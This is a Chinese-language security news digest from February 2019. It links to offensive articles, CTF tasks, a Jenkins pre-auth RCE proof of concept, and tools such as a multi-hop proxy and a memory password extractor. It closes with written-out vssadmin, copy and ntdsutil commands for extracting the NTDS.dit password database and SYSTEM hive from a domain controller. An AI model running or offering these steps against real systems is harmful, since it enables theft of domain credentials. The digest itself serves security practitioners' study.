2019.02.23

【文章】 利用Excel的宏实现C2 :https://dev.to/michaelneu/to-vba-and-beyond---building-a-restful-backend-using-plain-microsoft-excel-macros-76n

【技巧】 通过公开信息创建自己的公民数据库:https://www.bellingcat.com/resources/how-tos/2019/02/14/creating-your-own-citizen-database/

【CTF】 2014-2018年DragonSectorCTF 的13个pwn题目: https://github.com/j00ru/ctf-tasks/blob/master/README.md

【POC】 Jenkins-PreAuth-RCE-PoC :https://github.com/petercunha/Jenkins-PreAuth-RCE-PoC

【文章】 Drupal SA-CORE-2019-003 远程命令执行分析 : https://paper.seebug.org/821/

【文章】 HTA文件攻击概要 :http://blog.sevagas.com/?Hacking-around-HTA-files

【文章】 科来网络安全分析案例 :http://www.colasoft.com.cn/network-security-analysis.php

【文章】 一篇文章带你深入理解 SQL 盲注 :https://www.anquanke.com/post/id/170626

【文章】 Orange的Hacking Jenkins系列 :https://devco.re/blog/author/orange/

【工具】 Go语言写的多级代理工具 :https://github.com/Dliv3/Venom

【工具】 Web版编译器:https://godbolt.org/

【工具】MimiDbg使用PowerMemory从内存中检索Wdigest密码 :https://github.com/giMini/mimiDbg/blob/master/Readme.md

【文章】 滥用Active Directory域服务中的不安全默认值:真实案例研究 : https://gosecure.net/2019/02/20/abusing-unsafe-defaults-in-active-directory/

【资讯】NASA资助的一个学校研究机构搞出了一个类DNA的分子系统,利于研究外星生命 :https://www.nasa.gov/press-release/nasa-funded-research-creates-dna-like-molecule-to-aid-search-for-alien-life

【技巧】 在不使用工具下盗取NTDS.dit和系统文件:

1) cmd
2) vssadmin create shadow /for=C:
3) copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit
4) copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM c:\SYSTEM

或
ntdsutil "ac in ntds" i "cr fu c:\temp" q q